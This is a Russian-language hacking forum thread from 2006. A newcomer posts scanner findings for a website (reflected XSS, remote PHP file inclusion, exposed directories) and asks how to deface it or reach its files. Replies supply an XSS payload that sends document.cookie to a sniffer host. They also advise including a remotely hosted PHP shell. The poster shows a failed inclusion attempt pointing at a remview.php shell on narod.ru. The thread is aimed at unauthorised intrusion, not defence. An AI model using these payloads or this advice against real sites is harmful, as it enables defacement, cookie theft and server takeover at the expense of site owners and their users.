Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
На сайте есть дырки. Помогите пожалуйста мне в дальнейшем |
19.02.2006, 20:28
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
Провел на форуме:
80773
Репутация:
0
|
|
На сайте есть дырки. Помогите пожалуйста мне в дальнейшем
Нашел уязвимость. Выполняется JavaScript :
http://www.site.com:443/interesting/index.php?pg=<Sсгiрt>а1егt()</Sсгiрt>
Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39
Warning: main(): Failed opening '../interesting/info/<Sсгiрt>а1егt()</Sсгiрt>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39
Потом просканил. Вот что мне выдал:
1) Серьезная уязвимость
Выполнение кода, взятого с удаленного сервера
Описание
Уязвимость "Code Injection" с помощью запроса:
http://www.site.com:443/interesting/...tp://wwwwwwww/
позволяет атакующему выполнять произвольный код, взятый с удаленного сервера.
2) Уязвимость
Реальный путь к серверу
Описание
Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.site.com:443/interesting/...tp://wwwwwwww/
Описание
Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.site.com:443/disks/index.php?pg=1'
Описание
Возможно получение реального пути к веб-серверу с помощью запроса:
http://www.site.com:443/audio/index.php?pg=1'
3) Доступна информация
Ссылки с параметрами
Описание
Список ссылок найденных на веб-сервере, которые используют какие-либо параметры:
/interesting/index.php?pg=multios
/archive/index.php?pg=010402
/disks/index.php?pg=SeaMed
/audio/index.php?pg=Aopen
4) Доступна информация
Доступ к директориям
Описание
Доступные директории:
/admin/
/communications/
/proccesors/
/boards/
/video/
/disks/
/audio/
/security/
/interesting/
/archive/
5) Недоступные директории
Описание
Cуществующие, но недоступные директории:
/cgi-bin/
/forum/
/mp3/
/search/
/tmp/
/includes/
/img/
Помогите пожалуйста, каким образом можно добиться дефейса или же получить доступ к файлам? |
|
|
19.02.2006, 20:30
|
|
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме:
9751364
Репутация:
1847
|
|
А ты пробовал зайти в доступную admin/?
|
|
|
|
19.02.2006, 20:45
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
Провел на форуме:
80773
Репутация:
0
|
|
:)
Сообщение от Trampled_clover
А ты пробовал зайти в доступную admin/?
Да, доступ туда есть, там написано:
Администратор форума
Логин:
Пароль:
Тока не говори мне что Брутить надо что-то 
мне сказали залить PHP шелл со своево сервака, но я не знаю как это сделать...
|
|
|
|
19.02.2006, 20:52
|
|
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718
Репутация:
268
|
|
Уязвимость "Code Injection" с помощью запроса:
http://www.site.com:443/interesting...ttp://wwwwwwww/
позволяет атакующему выполнять произвольный код, взятый с удаленного сервера.
Ну раз есть такая дыра, то можно судя по всему выполнять команды. Ну вот эту брешь и юзай! Почитай статьи про php source injection и будет тебе счастье. |
|
|
|
19.02.2006, 21:43
|
|
Познающий
Регистрация: 09.09.2005
Сообщений: 90
Провел на форуме:
827197
Репутация:
22
|
|
Сообщение от Cnekmp
Нашел уязвимость. Выполняется JavaScript:
http://www.site.com:443/interesting/index.php?pg=<Sсгiрt>а1егt()</Sсгiрt>
если выполняется произвольный код, значит есть уязвимость xss.
вмечто кода алерта подставляй ссылку на снифер.
бует примерно так: http:/www.site.com:443/interesting/index.php?pg=<script src="http://adressnifera"+document.cookie;></script>
Сообщение от Cnekmp
Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39
Warning: main(): Failed opening '../interesting/info/<Sсгiрt>а1егt()</Sсгiрt>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39
и пхп инекция, пробуй вместо <Sсгiрt>аlегt()</Sсгiрt> поставить ссылку на предворительно залитый табой шел.
//может чё нить и получиться)
|
|
|
|
20.02.2006, 00:10
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
Провел на форуме:
80773
Репутация:
0
|
|
Сообщение от Evolution
если выполняется произвольный код, значит есть уязвимость xss.
вмечто кода алерта подставляй ссылку на снифер.
бует примерно так: http:/www.site.com:443/interesting/index.php?pg=<script src="http://adressnifera"+document.cookie;></script>
и пхп инекция, пробуй вместо <Sсгiрt>аlегt()</Sсгiрt> поставить ссылку на предворительно залитый табой шел.
//может чё нить и получиться)
1) Сниффер молчит....
Вот ответ на заливку сниффера:
Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com:443/html/interesting/index.php on line 39
Warning: main(): Failed opening '../interesting/info/<script src=\"http://s.netsec.ru/xxx/pic.gif\" document.cookie;></script>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39
2) А как Шелл делать?
|
|
|
|
20.02.2006, 00:19
|
|
Познающий
Регистрация: 09.09.2005
Сообщений: 90
Провел на форуме:
827197
Репутация:
22
|
|
Сообщение от Cnekmp
1) Сниффер молчит....
Вот ответ на заливку сниффера:
Warning: main(../interesting/info/.php): failed to open stream: No such file or directory in /www/hosts/www.site.com:443/html/interesting/index.php on line 39
Warning: main(): Failed opening '../interesting/info/<script src=\"http://s.netsec.ru/xxx/pic.gif\" document.cookie;></script>.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39
2) А как Шелл делать?
снифер не надо ни куда заливать! ты должен дать ссылку(<script src="http://adressnifera"+document.cookie;></script>) и куки должны прити на твой снифер.
а шел мона просто скачать от сюда
а вообще не поленись зайти на яндекс/гугл и поискать что же такое шел и что делают со снифером!
|
|
|
|
20.02.2006, 00:20
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
|
|
|
|
20.02.2006, 00:47
|
|
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453
Репутация:
113
|
|
|
|
|
|
20.02.2006, 09:20
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
Провел на форуме:
80773
Репутация:
0
|
|
Попробовал все что вы сказали, через народ залить....
Может JavaScript-ом попробововать???
Вот ответ:
Warning: main(../interesting/info/http://cnekmp2005.narod.ru/remview.php.php): failed to open stream: No such file or directory in /www/hosts/www.site.com/html/interesting/index.php on line 39
Warning: main(): Failed opening '../interesting/info/http://cnekmp2005.narod.ru/remview.php.php' for inclusion (include_path='.:') in /www/hosts/www.site.com/html/interesting/index.php on line 39
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
